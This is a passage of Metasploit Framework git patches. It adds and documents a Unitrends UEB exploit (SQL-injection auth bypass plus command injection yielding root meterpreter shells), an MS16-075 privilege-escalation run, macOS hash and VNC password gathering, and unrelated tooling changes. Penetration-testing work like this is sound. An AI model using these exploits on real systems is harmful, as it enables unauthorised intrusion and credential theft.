after you have established a +session, you must use incognito to imperonsate the SYSTEM Token. +## Usage + You'll first need to obtain a session on the target system. + Next, once the module is loaded, one simply needs to set the +```payload``` and ```session``` options, in addition to architecture. + + Your user at which you are trying to exploit must have `SeImpersonate` +privileges. + + The module has a hardcoded timeout of 20 seconds, as the attack may +not work immediately and take a few seconds to start. Also, check to +make sure port 6666 is inherently not in use else the exploit will not +run properly + +## Scenario +``` + Name Current Setting Required Description + ---- --------------- -------- ----------- + SESSION 48 yes The session to run this module on. Payload options +(windows/x64/meterpreter/reverse_tcp): + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, +process, none) + LHOST ens3 yes The listen address (an interface may be specified) + LPORT 3312 yes The listen port Exploit target: + Id Name + -- ---- + 1 Windows x64 msf exploit(windows/local/ms16_075_reflection) > run +[*] Started reverse TCP handler on -snip-:3312 [*] Launching notepad to +host the exploit... [+] Process 3564 launched. [*] Reflectively +injecting the exploit DLL into 3564... [*] Injecting exploit into +3564... [*] Exploit injected. Injecting payload into 3564... [*] Payload +injected. Executing exploit... [+] Exploit finished, wait for (hopefully +privileged) payload execution to complete. [*] Sending stage (206403 +bytes) to -snip- [*] Meterpreter session 49 opened (-snip-:3312 -> +-snip-:55306) at 2018-08-03 01:54:18 -0400 meterpreter > load incognito +Loading extension incognito...Success. meterpreter > impersonate_token +'NT AUTHORITY\SYSTEM' [-] Warning: Not currently running as SYSTEM, not +all tokens will be available + Call rev2self if primary process token is SYSTEM [-] No +delegation token available [+] Successfully impersonated user NT +AUTHORITY\SYSTEM meterpreter > getsystem -t 1 ...got system via +technique 1 (Named Pipe Impersonation (In Memory/Admin)). meterpreter > +``` From c18b46ecb5fde70b2f7cf217b796717255383b67 Mon Sep 17 00:00:00 2001 From: Mumbai Date: Tue, 21 Aug 2018 11:29:44 -0400 Subject: [PATCH 023/192] add delay --- modules/exploits/windows/local/ms16_075_reflection.rb | 1 + 1 file changed, 1 insertion(+) diff --git a/modules/exploits/windows/local/ms16_075_reflection.rb b/modules/exploits/windows/local/ms16_075_reflection.rb index c573cb3a78..ad5808dd80 100644 --- a/modules/exploits/windows/local/ms16_075_reflection.rb +++ b/modules/exploits/windows/local/ms16_075_reflection.rb @@ -36,6 +36,7 @@ class MetasploitModule < Msf::Exploit::Local 'DefaultOptions' => { 'EXITFUNC' => 'none', + 'WfsDelay' => '20', }, 'Targets' => [ From d6949ad7921e25a8d43a677a103a2abf806aa98d Mon Sep 17 00:00:00 2001 From: Austin <30811388+realoriginal@users.noreply.github.com> Date: Thu, 23 Aug 2018 16:54:22 -0400 Subject: [PATCH 024/192] Add check for SeImpersonatePrivilege Checks for the incurrence of the SeImpersonatePrivilege to be able to successfully exploit --- .../exploits/windows/local/ms16_075_reflection.rb | 15 +++++++++++++++ 1 file changed, 15 insertions(+) diff --git a/modules/exploits/windows/local/ms16_075_reflection.rb b/modules/exploits/windows/local/ms16_075_reflection.rb index ad5808dd80..9a5f233982 100644 --- a/modules/exploits/windows/local/ms16_075_reflection.rb +++ b/modules/exploits/windows/local/ms16_075_reflection.rb @@ -75,8 +75,23 @@ class MetasploitModule < Msf::Exploit::Local return arch end + + def check + privs = client.sys.config.getprivs + + if privs.include?('SeImpersonatePrivilege') + return Exploit::CheckCode::Detected + end + + return Exploit::CheckCode::Safe + end def exploit + + if check == Exploit::CheckCode::Safe + fail_with(Failure::None, 'User does not have the SeImpersonate Privilege') + end + if is_system? fail_with(Failure::None, 'Session is already elevated') end From 0887236f5ea647d444b64d7ca07166c72fdcdf31 Mon Sep 17 00:00:00 2001 From: Austin <30811388+realoriginal@users.noreply.github.com> Date: Wed, 29 Aug 2018 19:28:48 -0400 Subject: [PATCH 025/192] Fix spaces issue --- modules/exploits/windows/local/ms16_075_reflection.rb | 7 ++----- 1 file changed, 2 insertions(+), 5 deletions(-) diff --git a/modules/exploits/windows/local/ms16_075_reflection.rb b/modules/exploits/windows/local/ms16_075_reflection.rb index 9a5f233982..f11cc48f9c 100644 --- a/modules/exploits/windows/local/ms16_075_reflection.rb +++ b/modules/exploits/windows/local/ms16_075_reflection.rb @@ -71,14 +71,12 @@ class MetasploitModule < Msf::Exploit::Local elsif sysinfo["Architecture"] == ARCH_X86 arch = ARCH_X86 end - - + return arch end def check privs = client.sys.config.getprivs - if privs.include?('SeImpersonatePrivilege') return Exploit::CheckCode::Detected end @@ -95,8 +93,7 @@ class MetasploitModule < Msf::Exploit::Local if is_system? fail_with(Failure::None, 'Session is already elevated') end - - + if sysinfo["Architecture"] =~ /wow64/i fail_with(Failure::NoTarget, 'Running against WOW64 is not supported') end From e1ec0ec8995c250e8819e89b8354f329edd5cc5e Mon Sep 17 00:00:00 2001 From: pwnforfun <38401374+pwnforfun@users.noreply.github.com> Date: Thu, 6 Sep 2018 12:00:36 +0200 Subject: [PATCH 026/192] hash_dump now working properly up to Mac OS X High Sierra (10.13.6 included) --- modules/post/osx/gather/hashdump.rb | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/modules/post/osx/gather/hashdump.rb b/modules/post/osx/gather/hashdump.rb index 694414c958..9447ec3a20 100644 --- a/modules/post/osx/gather/hashdump.rb +++ b/modules/post/osx/gather/hashdump.rb @@ -8,7 +8,7 @@ require 'rexml/document' class MetasploitModule < Msf::Post # set of accounts to ignore while pilfering data - OSX_IGNORE_ACCOUNTS = ["Shared", ".localized"] + #OSX_IGNORE_ACCOUNTS = ["Shared", ".localized"] include Msf::Post::File include Msf::Post::OSX::Priv @@ -203,7 +203,10 @@ class MetasploitModule < Msf::Post # @return [Array] list of user names def users - @users ||= cmd_exec("/bin/ls /Users").each_line.collect.map(&:chomp) - OSX_IGNORE_ACCOUNTS + tmp = cmd_exec("dscacheutil -q user").split(/$/).map(&:strip) #- OSX_IGNORE_ACCOUNTS + res = Array.new() + tmp.each_with_index{ |val, index| res << val.split("name: ")[1] if val.include?("name: ") and tmp[index+1].include?("**")} + res end # @return [String] version string (e.g. 10.8.5) From 589fb4bf3b5f941898d991c4f131642ad23d3dd6 Mon Sep 17 00:00:00 2001 From: h00die Date: Sun, 9 Sep 2018 22:41:01 -0400 Subject: [PATCH 027/192] first try at ueb mix --- .../{ueb9_api_storage.md => ueb_api_rce.rb} | 0 .../{ueb9_api_storage.rb => ueb_api_rce.rb} | 63 ++++++++++++++----- 2 files changed, 48 insertions(+), 15 deletions(-) rename documentation/modules/exploit/linux/http/{ueb9_api_storage.md => ueb_api_rce.rb} (100%) rename modules/exploits/linux/http/{ueb9_api_storage.rb => ueb_api_rce.rb} (56%) diff --git a/documentation/modules/exploit/linux/http/ueb9_api_storage.md b/documentation/modules/exploit/linux/http/ueb_api_rce.rb similarity index 100% rename from documentation/modules/exploit/linux/http/ueb9_api_storage.md rename to documentation/modules/exploit/linux/http/ueb_api_rce.rb diff --git a/modules/exploits/linux/http/ueb9_api_storage.rb b/modules/exploits/linux/http/ueb_api_rce.rb similarity index 56% rename from modules/exploits/linux/http/ueb9_api_storage.rb rename to modules/exploits/linux/http/ueb_api_rce.rb index ecbd7bea32..259b156233 100644 --- a/modules/exploits/linux/http/ueb9_api_storage.rb +++ b/modules/exploits/linux/http/ueb_api_rce.rb @@ -11,18 +11,21 @@ class MetasploitModule < Msf::Exploit::Remote def initialize(info = {}) super(update_info(info, - 'Name' => 'Unitrends UEB 9 http api/storage remote root', + 'Name' => 'Unitrends UEB http api remote code execution', 'Description' => %q{ It was discovered that the api/storage web interface in Unitrends Backup (UB) before 10.0.0 has an issue in which one of its input parameters was not validated. A remote attacker could use this flaw to bypass authentication and execute arbitrary commands with root privilege on the target system. + UEB v9 runs the api under root privileges and api/storage is vulnerable. + UEB v10 runs the api under limited privileges and api/hosts is vulnerable. }, 'Author' => [ 'Cale Smith', # @0xC413 'Benny Husted', # @BennyHusted - 'Jared Arave' # @iotennui + 'Jared Arave', # @iotennui + 'h00die' ], 'License' => MSF_LICENSE, 'Platform' => 'linux', @@ -31,14 +34,18 @@ class MetasploitModule < Msf::Exploit::Remote 'References' => [ ['URL', 'https://support.unitrends.com/UnitrendsBackup/s/article/ka640000000TO5PAAW/000005756'], + ['URL', 'https://support.unitrends.com/UnitrendsBackup/s/article/000006002'], ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2017-12478'], + ['URL', 'http://blog.redactedsec.net/exploits/2018/01/29/UEB9.html'], + ['EDB', '44297'], ['CVE', '2017-12478'], + ['CVE', '2018-6328'] ], 'Targets' => [ - [ 'UEB 9.*', { } ] + [ 'UEB 9.*', { 'Privileged' => true} ], + [ 'UEB < 10.1.0', { 'Privileged' => false} ] ], - 'Privileged' => true, 'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp', 'SSL' => true @@ -53,6 +60,28 @@ class MetasploitModule < Msf::Exploit::Remote deregister_options('SRVHOST', 'SRVPORT') end + def authToken + session = "v0:b' UNION SELECT -1 -- :1:/usr/bp/logs.dir/gui_root.log:0" #SQLi auth bypass + Base64.strict_encode64(session) #b64 encode session token + end + + def check + res = send_request_cgi!({ + 'method' => 'GET', + 'uri' => '/api/systems/details', + 'ctype' => 'application/json', + 'headers' => + {'AuthToken' => authToken} + }) + if res && res.code == 200 + print_good("Good news, looks like a vulnerable version of UEB.") + return CheckCode::Appears + else + print_bad('Host does not appear to be vulnerable.') + end + return CheckCode::Safe + end + #substitue some charactes def filter_bad_chars(cmd) cmd.gsub!("\\", "\\\\\\") @@ -60,23 +89,27 @@ class MetasploitModule < Msf::Exploit::Remote end def execute_command(cmd, opts = {}) - session = "v0:b' UNION SELECT -1 -- :1:/usr/bp/logs.dir/gui_root.log:0" #SQLi auth bypass - session = Base64.strict_encode64(session) #b64 encode session token - - #substitue the cmd into the hostname parameter - parms = %Q|{"type":4,"name":"_Stateless","usage":"stateless","build_filesystem":1,"properties":{"username":"aaaa","password":"aaaa","hostname":"`| - parms << filter_bad_chars(cmd) - parms << %Q|` &","port":"2049","protocol":"nfs","share_name":"aaa"}}| - + if target.name == 'UEB 9.*' + #substitue the cmd into the hostname parameter + parms = %Q|{"type":4,"name":"_Stateless","usage":"stateless","build_filesystem":1,"properties":{"username":"aaaa","password":"aaaa","hostname":"`| + parms << filter_bad_chars(cmd) + parms << %Q|` &","port":"2049","protocol":"nfs","share_name":"aaa"}}| + uri = '/api/storage' + elsif target.name == 'UEB < 10.1.0' + parms = %Q|{"name":"ffff","ip":"10.0.0.200'\\"`0&| + params << filter_bad_chars(cmd) + params << %Q|`'"}| + uri = '/api/hosts' + end res = send_request_cgi({ - 'uri' => '/api/storage', + 'uri' => uri, 'method' => 'POST', 'ctype' => 'application/json', 'encode_params' => false, 'data' => parms, 'headers' => - {'AuthToken' => session} + {'AuthToken' => authToken} }) if res && res.code != 500 @@ -87,7 +120,7 @@ class MetasploitModule < Msf::Exploit::Remote end def exploit - print_status("#{peer} - pwn'ng ueb 9....") + print_status("#{peer} - Sending requests to UEB...") execute_cmdstager(:linemax => 120) end end From d8f2d08058ba43fc7192ac5a6fbe2cfc6bc97c03 Mon Sep 17 00:00:00 2001 From: h00die Date: Mon, 10 Sep 2018 21:08:30 -0400 Subject: [PATCH 028/192] finish up docs and 10 exploit --- .../modules/exploit/linux/http/ueb_api_rce.md | 93 +++++++++++++++++++ .../modules/exploit/linux/http/ueb_api_rce.rb | 42 --------- modules/exploits/linux/http/ueb_api_rce.rb | 4 +- 3 files changed, 95 insertions(+), 44 deletions(-) create mode 100644 documentation/modules/exploit/linux/http/ueb_api_rce.md delete mode 100644 documentation/modules/exploit/linux/http/ueb_api_rce.rb diff --git a/documentation/modules/exploit/linux/http/ueb_api_rce.md b/documentation/modules/exploit/linux/http/ueb_api_rce.md new file mode 100644 index 0000000000..7ffdcbd305 --- /dev/null +++ b/documentation/modules/exploit/linux/http/ueb_api_rce.md @@ -0,0 +1,93 @@ +## Vulnerable Application + +This exploit leverages a sqli vulnerability for authentication bypass, +together with command injection for subsequent RCE. + +This exploit has two targets: + + 1. Unitrends UEB 9 http api/storage RCE for root privileges + 2. Unitrends UEB < 10.1.0 api/hosts RCE for user (apache) privileges + +## Verification Steps + + 1. ```use exploit/linux/http/ueb_api_rce``` + 2. ```set lhost [IP]``` + 3. ```set rhost [IP]``` + 4. ```set target [#]``` + 5. ```exploit``` + 6. A meterpreter session should have been opened successfully + +## Scenarios + +### UEB 9.2 on CentOS 6.5 Using api/storage (target 0) root exploit + +``` +msf5 > use exploit/linux/http/ueb_api_rce +msf5 exploit(linux/http/ueb_api_rce) > set target 0 +target => 0 +msf5 exploit(linux/http/ueb_api_rce) > set rhost 1.1.1.1 +rhost => 1.1.1.1 +msf5 exploit(linux/http/ueb_api_rce) > set lhost 2.2.2.2 +lhost => 2.2.2.2 +msf5 exploit(linux/http/ueb_api_rce) > exploit + +[*] Started reverse TCP handler on 2.2.2.2:4444 +[*] 1.1.1.1:443 - Sending requests to UEB... +[*] Command Stager progress - 19.76% done (164/830 bytes) +[*] Command Stager progress - 39.16% done (325/830 bytes) +[*] Command Stager progress - 56.87% done (472/830 bytes) +[*] Command Stager progress - 74.82% done (621/830 bytes) +[*] Command Stager progress - 92.77% done (770/830 bytes) +[*] Command Stager progress - 110.48% done (917/830 bytes) +[*] Sending stage (861480 bytes) to 1.1.1.1 +[*] Command Stager progress - 126.63% done (1051/830 bytes) +[*] Meterpreter session 1 opened (2.2.2.2:4444 -> 1.1.1.1:43600) at 2018-09-10 20:51:16 -0400 + +meterpreter > sysinfo +Computer : 1.1.1.1 +OS : Red Hat 6.5 (Linux 2.6.32-573.26.1.el6.x86_64) +Architecture : x64 +BuildTuple : i486-linux-musl +Meterpreter : x86/linux +meterpreter > getuid +Server username: uid=0, gid=0, euid=0, egid=0 +``` + +### UEB 9.2 on CentOS 6.5 Using api/hosts (target 1) exploit + +``` +msf5 > use exploit/linux/http/ueb_api_rce +msf5 exploit(linux/http/ueb_api_rce) > set target 1 +target => 1 +msf5 exploit(linux/http/ueb_api_rce) > set rhost 1.1.1.1 +rhost => 1.1.1.1 +msf5 exploit(linux/http/ueb_api_rce) > set lhost 2.2.2.2 +lhost => 2.2.2.2 +msf5 exploit(linux/http/ueb_api_rce) > exploit + +[*] Started reverse TCP handler on 2.2.2.2:4444 +[*] 1.1.1.1:443 - Sending requests to UEB... +[*] Command Stager progress - 19.76% done (164/830 bytes) +[*] Command Stager progress - 39.16% done (325/830 bytes) +[*] Command Stager progress - 56.87% done (472/830 bytes) +[*] Command Stager progress - 74.82% done (621/830 bytes) +[*] Command Stager progress - 92.77% done (770/830 bytes) +[*] Command Stager progress - 110.48% done (917/830 bytes) +[*] Sending stage (861480 bytes) to 1.1.1.1 +[*] Meterpreter session 1 opened (2.2.2.2:4444 -> 1.1.1.1:43515) at 2018-09-10 20:46:24 -0400 +[*] Command Stager progress - 126.63% done (1051/830 bytes) + +meterpreter > sysinfo +Computer : 1.1.1.1 +OS : Red Hat 6.5 (Linux 2.6.32-573.26.1.el6.x86_64) +Architecture : x64 +BuildTuple : i486-linux-musl +Meterpreter : x86/linux +meterpreter > getuid +Server username: uid=48, gid=48, euid=48, egid=48 +meterpreter > shell +Process 25534 created. +Channel 1 created. +whoami +apache +``` diff --git a/documentation/modules/exploit/linux/http/ueb_api_rce.rb b/documentation/modules/exploit/linux/http/ueb_api_rce.rb deleted file mode 100644 index 05abde08c9..0000000000 --- a/documentation/modules/exploit/linux/http/ueb_api_rce.rb +++ /dev/null @@ -1,42 +0,0 @@ -## Vulnerable Application - - Unitrends UEB 9 http api/storage remote root - - This exploit leverages a sqli vulnerability for authentication bypass, - together with command injection for subsequent root RCE. - -## Verification Steps - - 1. ```use exploit/linux/http/ueb9_api_storage ``` - 2. ```set lhost [IP]``` - 3. ```set rhost [IP]``` - 4. ```exploit``` - 5. A meterpreter session should have been opened successfully - -## Scenarios - -### UEB 9.1 on CentOS 6.5 - -``` -msf > use exploit/linux/http/ueb9_api_storage -msf exploit(ueb9_api_storage) > set rhost 10.0.0.230 -rhost => 10.0.0.230 -msf exploit(ueb9_api_storage) > set lhost 10.0.0.141 -lhost => 10.0.0.141 -msf exploit(ueb9_api_storage) > exploit - -[*] Started reverse TCP handler on 10.0.0.141:4444 -[*] 10.0.0.230:443 - pwn'ng ueb 9.... -[*] Command Stager progress - 19.83% done (164/827 bytes) -[*] Command Stager progress - 39.30% done (325/827 bytes) -[*] Command Stager progress - 57.44% done (475/827 bytes) -[*] Command Stager progress - 75.45% done (624/827 bytes) -[*] Command Stager progress - 93.35% done (772/827 bytes) -[*] Command Stager progress - 110.88% done (917/827 bytes) -[*] Sending stage (826872 bytes) to 10.0.0.230 -[*] Command Stager progress - 126.72% done (1048/827 bytes) -[*] Meterpreter session 1 opened (10.0.0.141:4444 -> 10.0.0.230:33674) at 2017-10-06 11:07:47 -0400 - -meterpreter > getuid -Server username: uid=0, gid=0, euid=0, egid=0 -``` \ No newline at end of file diff --git a/modules/exploits/linux/http/ueb_api_rce.rb b/modules/exploits/linux/http/ueb_api_rce.rb index 259b156233..b52b573d6f 100644 --- a/modules/exploits/linux/http/ueb_api_rce.rb +++ b/modules/exploits/linux/http/ueb_api_rce.rb @@ -97,8 +97,8 @@ class MetasploitModule < Msf::Exploit::Remote uri = '/api/storage' elsif target.name == 'UEB < 10.1.0' parms = %Q|{"name":"ffff","ip":"10.0.0.200'\\"`0&| - params << filter_bad_chars(cmd) - params << %Q|`'"}| + parms << filter_bad_chars(cmd) + parms << %Q|`'"}| uri = '/api/hosts' end From 354803185c2ebb916844016262b6f67de1ec9a47 Mon Sep 17 00:00:00 2001 From: h00die Date: Tue, 11 Sep 2018 05:24:01 -0400 Subject: [PATCH 029/192] fix msftidy warning --- modules/exploits/linux/http/ueb_api_rce.rb | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/modules/exploits/linux/http/ueb_api_rce.rb b/modules/exploits/linux/http/ueb_api_rce.rb index b52b573d6f..190af58075 100644 --- a/modules/exploits/linux/http/ueb_api_rce.rb +++ b/modules/exploits/linux/http/ueb_api_rce.rb @@ -60,7 +60,7 @@ class MetasploitModule < Msf::Exploit::Remote deregister_options('SRVHOST', 'SRVPORT') end - def authToken + def auth_token session = "v0:b' UNION SELECT -1 -- :1:/usr/bp/logs.dir/gui_root.log:0" #SQLi auth bypass Base64.strict_encode64(session) #b64 encode session token end @@ -71,7 +71,7 @@ class MetasploitModule < Msf::Exploit::Remote 'uri' => '/api/systems/details', 'ctype' => 'application/json', 'headers' => - {'AuthToken' => authToken} + {'AuthToken' => auth_token} }) if res && res.code == 200 print_good("Good news, looks like a vulnerable version of UEB.") @@ -109,7 +109,7 @@ class MetasploitModule < Msf::Exploit::Remote 'encode_params' => false, 'data' => parms, 'headers' => - {'AuthToken' => authToken} + {'AuthToken' => auth_token} }) if res && res.code != 500 @@ -124,3 +124,4 @@ class MetasploitModule < Msf::Exploit::Remote execute_cmdstager(:linemax => 120) end end + From 68750ca19cec30d646f8865e7a8e9cabdcc3d0b4 Mon Sep 17 00:00:00 2001 From: Kevin Gonzalvo Date: Sat, 15 Sep 2018 12:20:01 +0200 Subject: [PATCH 030/192] Added documentation Documentation is added for the post-exploitation modules vnc_password_osx. --- .../post/osx/gather/vnc_password_osx.md | 35 +++++++++++++++++++ 1 file changed, 35 insertions(+) create mode 100644 documentation/modules/post/osx/gather/vnc_password_osx.md diff --git a/documentation/modules/post/osx/gather/vnc_password_osx.md b/documentation/modules/post/osx/gather/vnc_password_osx.md new file mode 100644 index 0000000000..bbb3f20678 --- /dev/null +++ b/documentation/modules/post/osx/gather/vnc_password_osx.md @@ -0,0 +1,35 @@ +This module show Apple VNC Password from Mac OS X High Sierra. + +## Vulnerable Application + + * macOS 10.13.6* + + +## Verification Steps + + Example steps in this format (is also in the PR): + + 1. Start `msfconsole` + 2. Do: `osx/gather/vnc_password_osx` + 3. Do: set the `SESSION [ID]` + 4. Do: ```run``` + 5. You should get the password + + +## Scenarios + + Typical run against an OSX session, with the vnc service activated: + +``` +msf5 exploit(multi/handler) > use osx/gather/vnc_password_osx +msf5 post(osx/gather/vnc_password_osx) > set SESSION 1 +SESSION => 1 +msf5 post(osx/gather/vnc_password_osx) > exploit + +[*] Running module against MacBook-Pro.local +[*] This session is running as root! +[*] Checking VNC Password... +[+] Password Found: PoCpassw +[*] Post module execution completed +msf5 post(osx/gather/vnc_password_osx) > +``` From 5a21444d39bc5734046a163d01e2c3872d529227 Mon Sep 17 00:00:00 2001 From: Kevin Gonzalvo Date: Sat, 15 Sep 2018 14:27:21 +0200 Subject: [PATCH 031/192] Fix documentation Added 'post' when use module. --- documentation/modules/post/osx/gather/vnc_password_osx.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/documentation/modules/post/osx/gather/vnc_password_osx.md b/documentation/modules/post/osx/gather/vnc_password_osx.md index bbb3f20678..7fe75adf0f 100644 --- a/documentation/modules/post/osx/gather/vnc_password_osx.md +++ b/documentation/modules/post/osx/gather/vnc_password_osx.md @@ -10,7 +10,7 @@ This module show Apple VNC Password from Mac OS X High Sierra. Example steps in this format (is also in the PR): 1. Start `msfconsole` - 2. Do: `osx/gather/vnc_password_osx` + 2. Do: `post/osx/gather/vnc_password_osx` 3. Do: set the `SESSION [ID]` 4. Do: ```run``` 5. You should get the password @@ -21,7 +21,7 @@ This module show Apple VNC Password from Mac OS X High Sierra. Typical run against an OSX session, with the vnc service activated: ``` -msf5 exploit(multi/handler) > use osx/gather/vnc_password_osx +msf5 exploit(multi/handler) > use post/osx/gather/vnc_password_osx msf5 post(osx/gather/vnc_password_osx) > set SESSION 1 SESSION => 1 msf5 post(osx/gather/vnc_password_osx) > exploit From b10671a331206e6ffaa6da358d78679708614fd6 Mon Sep 17 00:00:00 2001 From: Tim W Date: Mon, 17 Sep 2018 06:04:11 +0800 Subject: [PATCH 032/192] Fix #10601, add api key for android wlan_geolocate --- .../meterpreter/ui/console/command_dispatcher/android.rb | 8 ++++++-- 1 file changed, 6 insertions(+), 2 deletions(-) diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb index 8d3d0c2872..f3c8386acf 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb @@ -565,16 +565,19 @@ class Console::CommandDispatcher::Android def cmd_wlan_geolocate(*args) wlan_geolocate_opts = Rex::Parser::Arguments.new( - '-h' => [ false, 'Help Banner' ] + '-h' => [ false, 'Help Banner' ], + '-a' => [ true, 'API key' ], ) - wlan_geolocate_opts.parse(args) do |opt, _idx, _val| + wlan_geolocate_opts.parse(args) do |opt, _idx, val| case opt when '-h' print_line('Usage: wlan_geolocate') print_line('Tries to get device geolocation from WLAN information and Google\'s API') print_line(wlan_geolocate_opts.usage) return + when '-a' + api_key = val end end @@ -592,6 +595,7 @@ class Console::CommandDispatcher::Android return end g = Rex::Google::Geolocation.new + g.set_api_key(api_key) wlan_list.each do |wlan| g.add_wlan(*wlan) From 1d091408f7d69ff49b9912f589e40940c1bb484d Mon Sep 17 00:00:00 2001 From: William Vu Date: Tue, 18 Sep 2018 19:57:04 -0500 Subject: [PATCH 033/192] Make msftidy happy --- .../exploits/windows/local/ms16_075_reflection.rb | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/modules/exploits/windows/local/ms16_075_reflection.rb b/modules/exploits/windows/local/ms16_075_reflection.rb index f11cc48f9c..f49a0511e0 100644 --- a/modules/exploits/windows/local/ms16_075_reflection.rb +++ b/modules/exploits/windows/local/ms16_075_reflection.rb @@ -50,6 +50,7 @@ class MetasploitModule < Msf::Exploit::Local 'References' => [ ['MSB', 'MS16-075'], + ['CVE', '2016-3225'], ['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/an-analysis-of-a-windows-kernel-mode-vulnerability-cve-2014-4113/'], ['URL', 'https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/'], ['URL', 'https://github.com/breenmachine/RottenPotatoNG'] @@ -71,29 +72,28 @@ class MetasploitModule < Msf::Exploit::Local elsif sysinfo["Architecture"] == ARCH_X86 arch = ARCH_X86 end - + return arch end - + def check privs = client.sys.config.getprivs if privs.include?('SeImpersonatePrivilege') return Exploit::CheckCode::Detected end - + return Exploit::CheckCode::Safe end def exploit - if check == Exploit::CheckCode::Safe fail_with(Failure::None, 'User does not have the SeImpersonate Privilege') end - + if is_system? fail_with(Failure::None, 'Session is already elevated') end - + if sysinfo["Architecture"] =~ /wow64/i fail_with(Failure::NoTarget, 'Running against WOW64 is not supported') end From 37335ed2821babc2275cc3faf69253852e886255 Mon Sep 17 00:00:00 2001 From: Green-m Date: Thu, 20 Sep 2018 18:36:23 +0800 Subject: [PATCH 034/192] Add spec test for cmd_set_tabs. --- .../console/command_dispatcher/core_spec.rb | 73 +++++++++++++++++++ 1 file changed, 73 insertions(+) diff --git a/spec/lib/msf/ui/console/command_dispatcher/core_spec.rb b/spec/lib/msf/ui/console/command_dispatcher/core_spec.rb index 6fa66bc98d..aa861b97fd 100644 --- a/spec/lib/msf/ui/console/command_dispatcher/core_spec.rb +++ b/spec/lib/msf/ui/console/command_dispatcher/core_spec.rb @@ -14,6 +14,8 @@ RSpec.describe Msf::Ui::Console::CommandDispatcher::Core do it { is_expected.to respond_to :cmd_get } it { is_expected.to respond_to :cmd_getg } + it { is_expected.to respond_to :cmd_set_tabs } + it { is_expected.to respond_to :cmd_setg_tabs } def set_and_test_variable(name, framework_value, module_value, framework_re, module_re) # set the current module @@ -80,4 +82,75 @@ RSpec.describe Msf::Ui::Console::CommandDispatcher::Core do end end end + + + def set_tabs_test(option) + allow(core).to receive(:active_module).and_return(mod) + # always assume set variables validate (largely irrelevant because ours are random) + allow(driver).to receive(:on_variable_set).and_return(true) + + # Test for setting uncomplete option + output = core.cmd_set_tabs(option, ["set"]) + expect(output).to be_kind_of(Array).or eq(nil) + + # Test for setting option + output = core.cmd_set_tabs("", ["set", option]) + expect(output).to be_kind_of(Array).or eq(nil) + end + + describe "#cmd_set_tabs" do + # The options of all kinds of modules. + all_options = ::Msf::Exploit.new.datastore.keys + + ::Msf::Post.new.datastore.keys + + ::Msf::Auxiliary.new.datastore.keys + all_options.uniq! + + context "with a Exploit active module" do + let(:mod) do + mod = ::Msf::Exploit.new + mod.send(:initialize, {}) + mod + end + + all_options.each do |option| + describe "with #{option} arguments" do + it "should return a instance of array" do + set_tabs_test(option) + end + end + end + end + + context "with a Post active module" do + let(:mod) do + mod = ::Msf::Post.new + mod.send(:initialize, {}) + mod + end + + all_options.each do |option| + describe "with #{option} arguments" do + it "should return a instance of array" do + set_tabs_test(option) + end + end + end + end + + context "with a Auxiliary active module" do + let(:mod) do + mod = ::Msf::Auxiliary.new + mod.send(:initialize, {}) + mod + end + + all_options.each do |option| + describe "with #{option} arguments" do + it "should return a instance of array" do + set_tabs_test(option) + end + end + end + end + end end From 0fd98d5eaa6001b2a7530c1a5dfb9eb94518b9f0 Mon Sep 17 00:00:00 2001 From: Matthew Kienow Date: Thu, 20 Sep 2018 17:31:06 -0400 Subject: [PATCH 035/192] Add set_raw_response method --- lib/msf/core/db_manager/http/servlet_helper.rb | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/lib/msf/core/db_manager/http/servlet_helper.rb b/lib/msf/core/db_manager/http/servlet_helper.rb index f247a8a0d5..e9dbe63cac 100644 --- a/lib/msf/core/db_manager/http/servlet_helper.rb +++ b/lib/msf/core/db_manager/http/servlet_helper.rb @@ -19,6 +19,11 @@ module ServletHelper set_json_data_response(response: '') end + def set_raw_response(data, code: 200) + headers = { 'Content-Type' => 'application/json' } + [code, headers, data] + end + def set_json_response(data, includes = nil, code = 200) headers = { 'Content-Type' => 'application/json' } [code, headers, to_json(data, includes)] From 8bd9faad22dd442b9115c7b9c025f0f3dcae97c7 Mon Sep 17 00:00:00 2001 From: Matthew Kienow Date: Thu, 20 Sep 2018 17:39:33 -0400 Subject: [PATCH 036/192] Initial JSON-RPC servlet and support architecture --- lib/msf/core/rpc.rb | 43 +++- lib/msf/core/rpc/json/dispatcher.rb | 206 ++++++++++++++++++ lib/msf/core/rpc/json/dispatcher_helper.rb | 28 +++ lib/msf/core/rpc/json/error.rb | 136 ++++++++++++ lib/msf/core/rpc/json/rpc_command.rb | 80 +++++++ lib/msf/core/rpc/json/rpc_command_factory.rb | 37 ++++ lib/msf/core/rpc/json/v1_0/rpc_command.rb | 117 ++++++++++ lib/msf/core/rpc/json/v2_0/rpc_test.rb | 30 +++ lib/msf/core/web_services/json_rpc_app.rb | 69 ++++++ .../web_services/servlet/json_rpc_servlet.rb | 36 +++ msf-json-rpc.ru | 21 ++ 11 files changed, 792 insertions(+), 11 deletions(-) create mode 100644 lib/msf/core/rpc/json/dispatcher.rb create mode 100644 lib/msf/core/rpc/json/dispatcher_helper.rb create mode 100644 lib/msf/core/rpc/json/error.rb create mode 100644 lib/msf/core/rpc/json/rpc_command.rb create mode 100644 lib/msf/core/rpc/json/rpc_command_factory.rb create mode 100644 lib/msf/core/rpc/json/v1_0/rpc_command.rb create mode 100644 lib/msf/core/rpc/json/v2_0/rpc_test.rb create mode 100644 lib/msf/core/web_services/json_rpc_app.rb create mode 100644 lib/msf/core/web_services/servlet/json_rpc_servlet.rb create mode 100644 msf-json-rpc.ru diff --git a/lib/msf/core/rpc.rb b/lib/msf/core/rpc.rb index 7558682bf2..f20dd1a823 100644 --- a/lib/msf/core/rpc.rb +++ b/lib/msf/core/rpc.rb @@ -1,14 +1,35 @@ # -*- coding: binary -*- -require 